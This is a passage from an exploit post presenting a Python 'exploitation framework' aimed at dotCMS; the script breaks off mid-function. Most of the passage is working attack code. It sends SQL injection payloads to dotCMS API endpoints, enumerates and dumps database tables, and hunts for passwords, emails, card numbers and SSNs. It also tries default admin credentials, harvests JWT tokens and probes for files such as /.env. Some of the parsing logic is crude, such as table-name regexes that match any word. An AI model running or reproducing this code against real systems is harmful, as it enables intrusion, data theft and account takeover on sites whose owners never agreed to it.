============================================================================================================================================= | # Title : dotCMS v24.04.24 lts v23 Advanced Exploitation Framework | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://github.com/dotCMS/core/releases/tag/v24.04.24_lts_v23 | ============================================================================================================================================= [+] References : [+] Summary : This Python-based framework is designed for authorized penetration testing of DotCMS applications. It provides a comprehensive exploitation workflow, including: Evidence Collection: Stores requests, responses, and screenshots in a SQLite database. Reconnaissance: Checks TLS/SSL, analyzes CORS settings, and asynchronously discovers endpoints. Vulnerability Assessment: Performs advanced SQL Injection testing (Time-Based, Error-Based, Boolean-Based, Union-Based). Exploitation: Extracts user data, hunts for JWT tokens, and tests for file inclusion (LFI) vulnerabilities. Post-Exploitation: Dumps configuration files and identifies sensitive data leaks. Reporting: Generates detailed penetration testing reports and execution statistics. [+] Key Features: Asynchronous and synchronous scanning. PoC evidence storage and logging. Supports extraction of users, JWTs, and sensitive configuration files. Generates professional reports with recommendations. Legal-use enforcement with explicit authorization confirmation. [+] Usage : * : Save as: poc.py Run : python poc.php -t 127.0.0.1 python3 poc.py -t https://demo.dotcms.com --full # Database Enumeration Only python3 poc.py -t https://demo.dotcms.com --database # Quick Scan python3 poc.py -t https://demo.dotcms.com --quick [+] POC : #!/usr/bin/env python3 """ DotCMS Advanced Exploitation Framework - by indoushka """ import os import sys import json import time import re import argparse import hashlib import base64 import sqlite3 import asyncio import aiohttp import ssl import socket import csv from datetime import datetime from urllib.parse import urljoin, quote, urlparse from concurrent.futures import ThreadPoolExecutor, as_completed from colorama import init, Fore, Style, Back import warnings warnings.filterwarnings("ignore") init(autoreset=True) class EvidenceCollector: """Collects and stores PoC evidence""" def __init__(self, target): self.target = target timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') self.evidence_dir = f"evidence_{timestamp}" os.makedirs(self.evidence_dir, exist_ok=True) self.evidence_db = f"{self.evidence_dir}/evidence.db" self.init_database() def init_database(self): conn = sqlite3.connect(self.evidence_db) cursor = conn.cursor() cursor.execute(''' CREATE TABLE IF NOT EXISTS evidence ( id INTEGER PRIMARY KEY, timestamp TEXT, vulnerability TEXT, endpoint TEXT, payload TEXT, request TEXT, response TEXT, screenshot_path TEXT, severity TEXT, cvss_score REAL, cwe_id INTEGER, verified INTEGER DEFAULT 0 ) ''') cursor.execute(''' CREATE TABLE IF NOT EXISTS extracted_data ( id INTEGER PRIMARY KEY, timestamp TEXT, data_type TEXT, data_value TEXT, source TEXT, hash TEXT ) ''') conn.commit() conn.close() def add_evidence(self, vuln_type, endpoint, payload, request, response, severity="High", cvss=7.5, cwe=None): conn = sqlite3.connect(self.evidence_db) cursor = conn.cursor() screenshot = f"{self.evidence_dir}/{vuln_type}_{datetime.now().strftime('%H%M%S')}.txt" with open(screenshot, 'w', encoding='utf-8') as f: f.write(f"REQUEST:\n{request}\n\nRESPONSE:\n{response}") cursor.execute(''' INSERT INTO evidence (timestamp, vulnerability, endpoint, payload, request, response, screenshot_path, severity, cvss_score, cwe_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) ''', (datetime.now().isoformat(), vuln_type, endpoint, payload, request, response, screenshot, severity, cvss, cwe)) evidence_id = cursor.lastrowid conn.commit() conn.close() print(f"{Fore.GREEN}[+] Evidence recorded (ID: {evidence_id}) for {vuln_type}") return evidence_id class DatabaseEnumerator: """Advanced database enumeration and dumping""" def __init__(self, exploiter): self.exploiter = exploiter self.db_info = {} self.tables = [] self.columns = {} self.data_dumps = {} def identify_database(self, vulnerable_endpoint): """Identify database type and version""" self.exploiter.log("[*] Identifying database type...", 'info') identification_payloads = { 'MySQL': ["' AND @@version like '%MySQL%'--", "' AND SLEEP(2)--"], 'PostgreSQL': ["' AND version() like '%PostgreSQL%'--", "' AND pg_sleep(2)--"], 'MSSQL': ["' AND @@version like '%Microsoft%'--", "' AND WAITFOR DELAY '00:00:02'--"], 'Oracle': ["' AND (SELECT banner FROM v$version) like '%Oracle%'--", "' AND dbms_pipe.receive_message(('a'),2)--"] } for db_type, payloads in identification_payloads.items(): for payload in payloads: try: start_time = time.time() response = self.exploiter.session.get( urljoin(self.exploiter.target, vulnerable_endpoint), params={'filter': payload}, timeout=10 ) elapsed = time.time() - start_time # Time-based detection if 'sleep' in payload.lower() or 'waitfor' in payload.lower(): if elapsed > 1.5: self.db_info['type'] = db_type self.exploiter.log(f"[+] Database identified as: {db_type}", 'success') break # Error/response based detection if db_type == 'MySQL' and 'MySQL' in response.text: self.db_info['type'] = db_type break elif db_type == 'PostgreSQL' and 'PostgreSQL' in response.text: self.db_info['type'] = db_type break elif db_type == 'MSSQL' and 'Microsoft' in response.text: self.db_info['type'] = db_type break except Exception as e: continue if 'type' in self.db_info: break if 'type' not in self.db_info: self.exploiter.log("[-] Could not identify database type", 'warning') self.db_info['type'] = 'Unknown' # Try to get version self.get_database_version(vulnerable_endpoint) return self.db_info def get_database_version(self, vulnerable_endpoint): """Get database version""" version_payloads = { 'MySQL': "' UNION SELECT @@version,NULL,NULL--", 'PostgreSQL': "' UNION SELECT version(),NULL,NULL--", 'MSSQL': "' UNION SELECT @@version,NULL,NULL--", 'Oracle': "' UNION SELECT banner FROM v$version WHERE rownum=1--" } if self.db_info.get('type') in version_payloads: payload = version_payloads[self.db_info['type']] try: response = self.exploiter.session.get( urljoin(self.exploiter.target, vulnerable_endpoint), params={'filter': payload}, timeout=10 ) # Extract version from response version_patterns = [ r'\d+\.\d+\.\d+', r'PostgreSQL \d+\.\d+', r'Microsoft SQL Server \d{4}', r'Oracle Database \d+g' ] for pattern in version_patterns: match = re.search(pattern, response.text) if match: self.db_info['version'] = match.group() self.exploiter.log(f"[+] Database version: {self.db_info['version']}", 'success') break except Exception as e: self.exploiter.log(f"[-] Failed to get version: {str(e)}", 'error') def enumerate_tables(self, vulnerable_endpoint, limit=50): """Enumerate database tables""" self.exploiter.log(f"[*] Enumerating database tables (limit: {limit})...", 'info') table_payloads = { 'MySQL': [ f"' UNION SELECT table_name,NULL,NULL FROM information_schema.tables LIMIT {limit}--", f"' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables LIMIT {limit}--" ], 'PostgreSQL': [ f"' UNION SELECT tablename,NULL,NULL FROM pg_tables LIMIT {limit}--", f"' UNION SELECT schemaname,tablename,NULL FROM pg_tables LIMIT {limit}--" ], 'MSSQL': [ f"' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--", f"' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables--" ] } tables = [] if self.db_info.get('type') in table_payloads: for payload in table_payloads[self.db_info['type']][:2]: try: response = self.exploiter.session.get( urljoin(self.exploiter.target, vulnerable_endpoint), params={'filter': payload}, timeout=15 ) # Extract table names - looking for patterns table_patterns = [ r'[a-zA-Z_][a-zA-Z0-9_]*', r'user[s_]?', r'admin[s_]?', r'passw(or)?d', r'credit', r'account', r'customer', r'client', r'order', r'transaction', r'payment', r'config', r'setting', r'log', r'audit', r'session', r'token', r'api', r'key', r'secret' ] # Find potential table names for pattern in table_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) for match in matches: if len(match) > 3 and match.lower() not in ['null', 'select', 'union', 'from']: if match not in tables: tables.append(match) if len(tables) >= limit: break if len(tables) >= limit: break if tables: break except Exception as e: self.exploiter.log(f"[-] Table enumeration failed: {str(e)}", 'error') # Clean and deduplicate tables = list(set([t for t in tables if isinstance(t, str)])) tables.sort() self.tables = tables[:limit] if self.tables: self.exploiter.log(f"[+] Found {len(self.tables)} potential tables:", 'success') for i, table in enumerate(self.tables[:20], 1): self.exploiter.log(f" {i:2}. {table}", 'success') # Save tables list with open(f"{self.exploiter.results_dir}/database_tables.json", 'w') as f: json.dump(self.tables, f, indent=2) return self.tables def enumerate_columns(self, vulnerable_endpoint, table_name): """Enumerate columns for a specific table""" self.exploiter.log(f"[*] Enumerating columns for table: {table_name}", 'info') column_payloads = { 'MySQL': [ f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--", f"' UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}'--" ], 'PostgreSQL': [ f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--", f"' UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}'--" ], 'MSSQL': [ f"' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}'--" ] } columns = [] if self.db_info.get('type') in column_payloads: for payload in column_payloads[self.db_info['type']][:2]: try: response = self.exploiter.session.get( urljoin(self.exploiter.target, vulnerable_endpoint), params={'filter': payload}, timeout=15 ) # Look for column name patterns column_patterns = [ r'[a-zA-Z_][a-zA-Z0-9_]*', r'user', r'pass', r'email', r'name', r'address', r'phone', r'credit', r'card', r'account', r'token', r'session', r'key', r'secret', r'salary', r'price', r'amount', r'balance', r'birth', r'ssn', r'social', r'security', r'ip', r'mac', r'device', r'browser' ] for pattern in column_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) for match in matches: if len(match) > 2 and match.lower() not in ['null', 'select', 'union', 'from', 'where']: if match not in columns: columns.append(match) if columns: break except Exception as e: self.exploiter.log(f"[-] Column enumeration failed: {str(e)}", 'error') # Clean and deduplicate columns = list(set([c for c in columns if isinstance(c, str)])) columns.sort() self.columns[table_name] = columns if columns: self.exploiter.log(f"[+] Found {len(columns)} potential columns for {table_name}:", 'success') for i, col in enumerate(columns[:15], 1): self.exploiter.log(f" {i:2}. {col}", 'success') return columns def dump_table_data(self, vulnerable_endpoint, table_name, columns=None, limit=100): """Dump data from specific table""" self.exploiter.log(f"[*] Dumping data from table: {table_name} (limit: {limit})", 'info') if not columns and table_name in self.columns: columns = self.columns[table_name] if not columns: self.exploiter.log(f"[-] No columns found for table {table_name}", 'warning') columns = ['*'] # Build column string if columns == ['*']: col_string = '*' else: # Take first 5 columns for initial dump col_string = ','.join(columns[:5]) dump_payloads = { 'MySQL': [ f"' UNION SELECT {col_string} FROM {table_name} LIMIT {limit}--", f"' UNION SELECT CONCAT_WS('|',{col_string}) FROM {table_name} LIMIT {limit}--" ], 'PostgreSQL': [ f"' UNION SELECT {col_string} FROM {table_name} LIMIT {limit}--", f"' UNION SELECT {col_string}||'|' FROM {table_name} LIMIT {limit}--" ], 'MSSQL': [ f"' UNION SELECT {col_string} FROM {table_name}--", f"' UNION SELECT {col_string}+'|' FROM {table_name}--" ] } dumped_data = [] if self.db_info.get('type') in dump_payloads: for payload in dump_payloads[self.db_info['type']][:2]: try: response = self.exploiter.session.get( urljoin(self.exploiter.target, vulnerable_endpoint), params={'filter': payload}, timeout=20 ) # Extract data - look for structured patterns data_patterns = [ # Email patterns r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}', # Phone numbers r'[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}', # Credit cards r'\b(?:\d[ -]*?){13,16}\b', # Dates r'\d{1,2}[/-]\d{1,2}[/-]\d{2,4}', # URLs r'https?://[^\s<>"\']+', # IP addresses r'\b(?:\d{1,3}\.){3}\d{1,3}\b', # Social security r'\d{3}-\d{2}-\d{4}', # Passwords/Hashes r'\$2[ay]\$\d+\$[a-zA-Z0-9./]+', # bcrypt r'[a-fA-F0-9]{32}', # MD5 r'[a-fA-F0-9]{40}', # SHA1 r'[a-fA-F0-9]{64}', # SHA256 ] # Also look for pipe-separated data (common in dumps) lines = response.text.split('\n') for line in lines: if '|' in line and len(line.strip()) > 5: parts = line.split('|') if len(parts) >= len(columns[:5]): record = {} for i, part in enumerate(parts[:len(columns[:5])]): if i < len(columns[:5]): record[columns[i] if i < len(columns) else f'col_{i}'] = part.strip() if record: dumped_data.append(record) # Look for patterns for pattern in data_patterns: matches = re.findall(pattern, line) for match in matches: if len(match) > 3: if not any(match in str(d) for d in dumped_data): dumped_data.append({'extracted_data': match, 'source': line[:50]}) if dumped_data: break except Exception as e: self.exploiter.log(f"[-] Data dump failed: {str(e)}", 'error') # Save dumped data if dumped_data: self.data_dumps[table_name] = dumped_data[:limit] # Save to JSON json_file = f"{self.exploiter.results_dir}/dump_{table_name}.json" with open(json_file, 'w', encoding='utf-8') as f: json.dump(dumped_data, f, indent=2, default=str) # Save to CSV if structured data csv_file = f"{self.exploiter.results_dir}/dump_{table_name}.csv" try: if all(isinstance(d, dict) for d in dumped_data): keys = set() for record in dumped_data: keys.update(record.keys()) with open(csv_file, 'w', newline='', encoding='utf-8') as f: writer = csv.DictWriter(f, fieldnames=list(keys)) writer.writeheader() writer.writerows(dumped_data) except: pass self.exploiter.log(f"[+] Dumped {len(dumped_data)} records from {table_name}", 'success') self.exploiter.log(f"[+] Data saved to: {json_file}", 'success') # Display sample self.exploiter.log(f"[*] Sample data from {table_name}:", 'info') for i, record in enumerate(dumped_data[:3], 1): self.exploiter.log(f" Record {i}: {str(record)[:100]}...", 'info') return dumped_data def search_cleartext_data(self, vulnerable_endpoint, search_terms=None): """Search for cleartext sensitive data across database""" self.exploiter.log("[*] Searching for cleartext sensitive data...", 'info') if not search_terms: search_terms = [ 'password', 'passwd', 'pwd', 'secret', 'token', 'key', 'credit', 'card', 'account', 'ssn', 'social', 'security', 'salary', 'income', 'balance', 'address', 'phone', 'email', 'username', 'login', 'admin', 'root' ] found_data = {} for term in search_terms: self.exploiter.log(f"[*] Searching for: {term}", 'info') search_payloads = { 'MySQL': [ f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--", f"' UNION SELECT CONCAT(table_name,'.',column_name),NULL,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--" ], 'PostgreSQL': [ f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--" ], 'MSSQL': [ f"' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE '%{term}%'--" ] } if self.db_info.get('type') in search_payloads: for payload in search_payloads[self.db_info['type']][:2]: try: response = self.exploiter.session.get( urljoin(self.exploiter.target, vulnerable_endpoint), params={'filter': payload}, timeout=15 ) # Look for table.column patterns patterns = [ rf'{term}', rf'[a-zA-Z_][a-zA-Z0-9_]*{term}[a-zA-Z0-9_]*', rf'[a-zA-Z_][a-zA-Z0-9_]*\.{term}[a-zA-Z0-9_]*' ] for pattern in patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) for match in matches: if match not in found_data: found_data[match] = term if term in found_data: break except Exception as e: continue # Try to extract actual data from found columns extracted_cleartext = {} for column_ref in found_data.keys(): if '.' in column_ref: table, column = column_ref.split('.', 1) # Try to extract data from this column extract_payload = { 'MySQL': f"' UNION SELECT {column} FROM {table} LIMIT 10--", 'PostgreSQL': f"' UNION SELECT {column} FROM {table} LIMIT 10--", 'MSSQL': f"' UNION SELECT {column} FROM {table}--" } if self.db_info.get('type') in extract_payload: try: response = self.exploiter.session.get( urljoin(self.exploiter.target, vulnerable_endpoint), params={'filter': extract_payload[self.db_info['type']]}, timeout=15 ) # Look for non-hash, non-null values lines = response.text.split('\n') for line in lines: line = line.strip() if (len(line) > 3 and len(line) < 100 and not line.startswith('$2') and # Not bcrypt not re.match(r'^[a-fA-F0-9]{32,128}$', line)): # Not hash if column not in extracted_cleartext: extracted_cleartext[column] = [] if line not in extracted_cleartext[column]: extracted_cleartext[column].append(line) except Exception as e: continue # Save results if found_data or extracted_cleartext: results = { 'sensitive_columns': found_data, 'cleartext_data': extracted_cleartext } results_file = f"{self.exploiter.results_dir}/cleartext_search.json" with open(results_file, 'w', encoding='utf-8') as f: json.dump(results, f, indent=2) # Display findings if found_data: self.exploiter.log("[+] Found sensitive columns:", 'success') for col in list(found_data.keys())[:10]: self.exploiter.log(f" • {col}", 'success') if extracted_cleartext: self.exploiter.log("[+] Found cleartext data:", 'success') for col, data in extracted_cleartext.items(): self.exploiter.log(f" • {col}: {data[:3]}...", 'success') return found_data, extracted_cleartext def comprehensive_database_dump(self, vulnerable_endpoint): """Perform comprehensive database dump""" self.exploiter.log("\n" + "="*80, 'info') self.exploiter.log("COMPREHENSIVE DATABASE DUMP", 'section') self.exploiter.log("="*80, 'info') # Step 1: Identify database db_info = self.identify_database(vulnerable_endpoint) # Step 2: Enumerate tables tables = self.enumerate_tables(vulnerable_endpoint, limit=30) # Step 3: For each interesting table, enumerate columns and dump data interesting_tables = [] interesting_patterns = [ 'user', 'admin', 'pass', 'account', 'customer', 'client', 'order', 'payment', 'credit', 'card', 'config', 'setting', 'token', 'session', 'log' ] for table in tables: for pattern in interesting_patterns: if pattern in table.lower(): interesting_tables.append(table) break # Also take some random tables if not enough interesting ones if len(interesting_tables) < 5 and len(tables) > 5: interesting_tables.extend([t for t in tables if t not in interesting_tables][:5]) # Step 4: Dump data from interesting tables all_dumped_data = {} for table in interesting_tables[:10]: # Limit to 10 tables try: # Enumerate columns columns = self.enumerate_columns(vulnerable_endpoint, table) # Dump data if columns: data = self.dump_table_data(vulnerable_endpoint, table, columns, limit=50) if data: all_dumped_data[table] = data time.sleep(1) # Rate limiting except Exception as e: self.exploiter.log(f"[-] Failed to dump {table}: {str(e)}", 'error') # Step 5: Search for cleartext data sensitive_cols, cleartext_data = self.search_cleartext_data(vulnerable_endpoint) # Step 6: Generate database report self.generate_database_report(db_info, tables, all_dumped_data, sensitive_cols, cleartext_data) return { 'database_info': db_info, 'tables': tables, 'dumped_data': all_dumped_data, 'sensitive_columns': sensitive_cols, 'cleartext_data': cleartext_data } def generate_database_report(self, db_info, tables, dumped_data, sensitive_cols, cleartext_data): """Generate comprehensive database report""" report = f""" {'='*80} DATABASE PENETRATION TEST REPORT {'='*80} Database Type: {db_info.get('type', 'Unknown')} Database Version: {db_info.get('version', 'Unknown')} Total Tables Found: {len(tables)} Tables Dumped: {len(dumped_data)} Sensitive Columns: {len(sensitive_cols)} Cleartext Data Found: {sum(len(v) for v in cleartext_data.values())} TABLE ENUMERATION {'-'*80} """ for i, table in enumerate(tables[:50], 1): report += f"{i:3}. {table}\n" report += f""" DATA DUMP SUMMARY {'-'*80} """ for table, data in dumped_data.items(): report += f"\n{table}:\n" report += f" Records dumped: {len(data)}\n" if data and isinstance(data[0], dict): sample_keys = list(data[0].keys())[:3] report += f" Sample columns: {', '.join(sample_keys)}\n" # Show sample data if data: report += f" Sample record: {str(data[0])[:100]}...\n" report += f""" SENSITIVE COLUMNS FOUND {'-'*80} """ for col, term in list(sensitive_cols.items())[:20]: report += f"• {col} (contains: {term})\n" report += f""" CLEARTEXT DATA DISCOVERED {'-'*80} """ for column, values in cleartext_data.items(): report += f"\n{column}:\n" for value in values[:5]: report += f" • {value}\n" if len(values) > 5: report += f" ... and {len(values) - 5} more\n" report += f""" SECURITY FINDINGS {'-'*80} 1. Database exposed via SQL injection 2. {len(sensitive_cols)} sensitive columns identified 3. {sum(len(v) for v in cleartext_data.values())} cleartext sensitive values found 4. {len(dumped_data)} tables successfully dumped RECOMMENDATIONS {'-'*80} 1. Immediate patch of SQL injection vulnerabilities 2. Encrypt all sensitive data at rest 3. Implement proper access controls to database 4. Conduct security audit of all database queries 5. Implement database activity monitoring 6. Rotate all exposed credentials immediately {'='*80} END OF DATABASE REPORT {'='*80} """ report_file = f"{self.exploiter.results_dir}/database_penetration_report.txt" with open(report_file, 'w', encoding='utf-8') as f: f.write(report) self.exploiter.log(f"[+] Database report generated: {report_file}", 'success') # Also save comprehensive JSON comprehensive_data = { 'database_info': db_info, 'all_tables': tables, 'dumped_tables': list(dumped_data.keys()), 'sensitive_columns': sensitive_cols, 'cleartext_data': cleartext_data, 'dump_summary': {table: len(data) for table, data in dumped_data.items()} } json_file = f"{self.exploiter.results_dir}/database_comprehensive.json" with open(json_file, 'w', encoding='utf-8') as f: json.dump(comprehensive_data, f, indent=2) return report # إضافة دوال جديدة إلى كلاس DotCMSExploiter الرئيسي class DotCMSExploiter: """Main exploitation class - Enhanced with Database Enumeration""" def __init__(self, target): self.target = target.rstrip('/') self.evidence = EvidenceCollector(target) self.db_enumerator = DatabaseEnumerator(self) # Initialize DB enumerator # Statistics self.stats = { 'vulnerabilities': 0, 'users_extracted': 0, 'tokens_found': 0, 'databases_found': 0, 'files_leaked': 0, 'tables_enumerated': 0, 'records_dumped': 0 } # Create results directory timestamp = datetime.now().strftime('%Y%m%d_%H%M%S') self.results_dir = f"results_{timestamp}" os.makedirs(self.results_dir, exist_ok=True) # Setup session import requests self.session = requests.Session() self.session.verify = False self.session.timeout = 30 self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive' }) # Suppress warnings import urllib3 urllib3.disable_warnings() print(f"{Fore.CYAN}{'='*80}") print(f"{Fore.YELLOW} DotCMS Advanced Exploitation Framework") print(f"{Fore.YELLOW} Enhanced with Database Enumeration") print(f"{Fore.CYAN}{'='*80}{Style.RESET_ALL}") def log(self, message, level='info'): """Log with colors""" timestamp = datetime.now().strftime('%H:%M:%S') colors = { 'success': Fore.GREEN + Style.BRIGHT, 'error': Fore.RED + Style.BRIGHT, 'warning': Fore.YELLOW + Style.BRIGHT, 'info': Fore.CYAN, 'critical': Fore.RED + Back.WHITE + Style.BRIGHT, 'debug': Fore.LIGHTBLACK_EX, 'section': Fore.MAGENTA + Style.BRIGHT, } color = colors.get(level, Fore.RESET) print(f"{color}[{timestamp}] {message}{Style.RESET_ALL}") # Log to file with open(f"{self.results_dir}/execution.log", 'a', encoding='utf-8') as f: f.write(f"[{timestamp}] {message}\n") def check_tls(self): """Check TLS/SSL configuration""" self.log("[*] Checking TLS/SSL configuration...", 'info') try: parsed = urlparse(self.target) hostname = parsed.hostname port = parsed.port or 443 context = ssl.create_default_context() with socket.create_connection((hostname, port), timeout=10) as sock: with context.wrap_socket(sock, server_hostname=hostname) as ssock: cert = ssock.getpeercert() # Check certificate expiry if 'notAfter' in cert: expires = datetime.strptime(cert['notAfter'], '%b %d %H:%M:%S %Y %Z') days_to_expire = (expires - datetime.now()).days if days_to_expire < 30: self.log(f"[-] Certificate expires in {days_to_expire} days", 'warning') else: self.log(f"[+] Certificate valid for {days_to_expire} days", 'success') # Get SSL/TLS version ssl_version = ssock.version() self.log(f"[+] SSL/TLS Version: {ssl_version}", 'success') except Exception as e: self.log(f"[-] TLS check failed: {str(e)}", 'error') def cors_analysis(self): """Analyze CORS configuration""" self.log("[*] Analyzing CORS configuration...", 'info') test_origins = [ 'https://evil.com', 'http://evil.com', 'null', self.target.replace('https://', 'http://'), ] vulnerable = False for origin in test_origins: headers = {'Origin': origin} try: response = self.session.get(self.target, headers=headers, timeout=10) if 'Access-Control-Allow-Origin' in response.headers: allowed_origin = response.headers['Access-Control-Allow-Origin'] if allowed_origin == origin or allowed_origin == '*': self.log(f"[!] CORS Misconfiguration: {allowed_origin}", 'warning') vulnerable = True if 'Access-Control-Allow-Credentials' in response.headers: if response.headers['Access-Control-Allow-Credentials'].lower() == 'true': self.log(f"[!] CORS with credentials allowed!", 'critical') except Exception as e: pass if not vulnerable: self.log("[+] CORS properly configured", 'success') async def async_discovery(self): """Asynchronous discovery of endpoints""" self.log("[*] Starting asynchronous discovery...", 'info') # Common DotCMS endpoints endpoints = [ '/api/v1/contenttype', '/api/v1/workflow', '/api/v1/sites', '/api/v1/users', '/api/v1/authentication', '/dotAdmin/', '/admin/', '/html/portlet/', '/c/', '/application/', '/.env', '/config.json', '/web.config', '/dotcms-config.xml' ] async def check_endpoint(session, endpoint): url = urljoin(self.target, endpoint) try: async with session.get(url, timeout=10, ssl=False) as response: return { 'endpoint': endpoint, 'status': response.status, 'url': str(response.url) } except Exception as e: return { 'endpoint': endpoint, 'status': 0, 'error': str(e) } connector = aiohttp.TCPConnector(ssl=False) timeout = aiohttp.ClientTimeout(total=30) async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session: tasks = [check_endpoint(session, endpoint) for endpoint in endpoints] results = await asyncio.gather(*tasks) discovered = [] for result in results: if isinstance(result, dict) and result.get('status', 0) in [200, 301, 302, 403]: discovered.append(result) self.log(f"[+] Discovered {len(discovered)} accessible endpoints", 'success') return discovered def enhanced_sqli_testing(self): """Enhanced SQL injection testing""" self.log("\n[*] Starting enhanced SQL injection testing...", 'info') endpoints = [ '/api/v1/contenttype', '/api/v1/workflow', '/api/v1/sites', '/dotAdmin/personalization' ] # Advanced payloads payloads = { 'Time-Based': [ "' AND (SELECT pg_sleep(5))--", "' AND SLEEP(5)--", "' WAITFOR DELAY '00:00:05'--", "' AND 1234=(SELECT 1234 FROM PG_SLEEP(5))--" ], 'Error-Based': [ "' AND (SELECT cast((SELECT 'test') as int))--", "' AND extractvalue(1, concat(0x7e, version()))--", "' AND 1=CONVERT(int, @@version)--" ], 'Boolean-Based': [ "' AND '1'='1", "' AND '1'='2", "' OR '1'='1" ], 'Union-Based': [ "' UNION SELECT NULL,NULL,NULL--", "' UNION SELECT 1,2,3--", "' UNION SELECT @@version,user(),database()--" ] } vulnerabilities = [] for endpoint in endpoints: self.log(f"[*] Testing endpoint: {endpoint}", 'info') url = urljoin(self.target, endpoint) # First get baseline try: baseline = self.session.get(url, timeout=10) baseline_length = len(baseline.text) except: baseline_length = 0 for category, category_payloads in payloads.items(): for payload in category_payloads[:3]: # Test first 3 of each category try: start_time = time.time() response = self.session.get( url, params={'filter': payload}, timeout=15 ) elapsed = time.time() - start_time # Time-Based detection if category == 'Time-Based' and elapsed > 4: self.log(f"[!] Time-Based SQLi detected on {endpoint}", 'critical') vulnerabilities.append({ 'endpoint': endpoint, 'type': category, 'payload': payload, 'delay': round(elapsed, 2), 'status': response.status_code }) evidence_id = self.evidence.add_evidence( f'SQL_Injection_{category}', endpoint, payload, f"GET {url}?filter={quote(payload)}", response.text[:1000], severity="Critical", cvss=9.0, cwe=89 ) self.stats['vulnerabilities'] += 1 break # Error-Based detection error_indicators = [ 'SQL syntax', 'mysql_fetch', 'pg_', 'ORA-', 'Microsoft OLE DB', 'Unclosed quotation', 'You have an error in your SQL syntax' ] if any(indicator.lower() in response.text.lower() for indicator in error_indicators): self.log(f"[!] Error-Based SQLi detected on {endpoint}", 'critical') vulnerabilities.append({ 'endpoint': endpoint, 'type': category, 'payload': payload, 'status': response.status_code }) evidence_id = self.evidence.add_evidence( f'SQL_Injection_{category}', endpoint, payload, f"GET {url}?filter={quote(payload)}", response.text[:1000], severity="Critical", cvss=9.0, cwe=89 ) self.stats['vulnerabilities'] += 1 break # Boolean-Based detection if category == 'Boolean-Based': test_length = len(response.text) if abs(baseline_length - test_length) > 200: self.log(f"[!] Boolean-Based SQLi suspected on {endpoint}", 'warning') vulnerabilities.append({ 'endpoint': endpoint, 'type': category, 'payload': payload, 'length_diff': abs(baseline_length - test_length) }) except Exception as e: continue return vulnerabilities def extract_users_comprehensive(self, vulnerable_endpoint=None): """Comprehensive user extraction""" self.log("\n[*] Starting comprehensive user extraction...", 'info') # If no endpoint provided, try common ones if not vulnerable_endpoint: endpoints_to_try = ['/api/v1/contenttype', '/api/v1/sites'] else: endpoints_to_try = [vulnerable_endpoint] users = [] for endpoint in endpoints_to_try: try: # Try to get version first version_payload = "' AND (SELECT substring(version() from 1 for 1))='P'--" response = self.session.get( urljoin(self.target, endpoint), params={'filter': version_payload}, timeout=10 ) # Simple extraction attempt extract_payload = "' UNION SELECT NULL,emailaddress,password_ FROM user_ LIMIT 5--" response = self.session.get( urljoin(self.target, endpoint), params={'filter': extract_payload}, timeout=10 ) # Look for email patterns in response email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' hash_pattern = r'\$2[ay]\$\d+\$[a-zA-Z0-9./]+' emails = re.findall(email_pattern, response.text) hashes = re.findall(hash_pattern, response.text) for email in emails[:5]: # Limit to 5 emails users.append({ 'email': email, 'source': endpoint, 'method': 'direct_extraction' }) self.log(f"[+] Found email: {email}", 'success') if emails or hashes: self.evidence.add_evidence( 'User_Data_Exposure', endpoint, extract_payload, f"GET {urljoin(self.target, endpoint)}?filter={quote(extract_payload)}", response.text[:2000], severity="High", cvss=7.5, cwe=200 ) except Exception as e: self.log(f"[-] Extraction failed for {endpoint}: {str(e)}", 'error') if users: self.log(f"[+] Extracted {len(users)} potential users", 'success') self.save_extracted_data('users', users) self.stats['users_extracted'] = len(users) return users def enhanced_jwt_hunting(self): """Enhanced JWT token hunting""" self.log("\n[*] Enhanced JWT token hunting...", 'info') found_tokens = [] # Check login endpoint login_url = urljoin(self.target, '/api/v1/authentication/logInUser') # Try default credentials default_creds = [ {'userId': 'admin@dotcms.com', 'password': 'admin'}, {'userId': 'admin', 'password': 'admin123'}, {'userId': 'demo', 'password': 'demo'} ] for creds in default_creds: try: response = self.session.post( login_url, json=creds, timeout=10 ) if response.status_code == 200: # Look for JWT in response jwt_pattern = r'[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+' tokens = re.findall(jwt_pattern, response.text) for token in tokens: if len(token) > 50: # Basic JWT validation found_tokens.append(token) self.log(f"[+] Found JWT token: {token[:30]}...", 'success') # Test token if self.validate_jwt(token): self.log(f"[✓] JWT token is valid!", 'success') except Exception as e: continue # Also check current user endpoint current_user_url = urljoin(self.target, '/api/v1/users/current') try: response = self.session.get(current_user_url, timeout=10) jwt_pattern = r'[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+' tokens = re.findall(jwt_pattern, response.text) 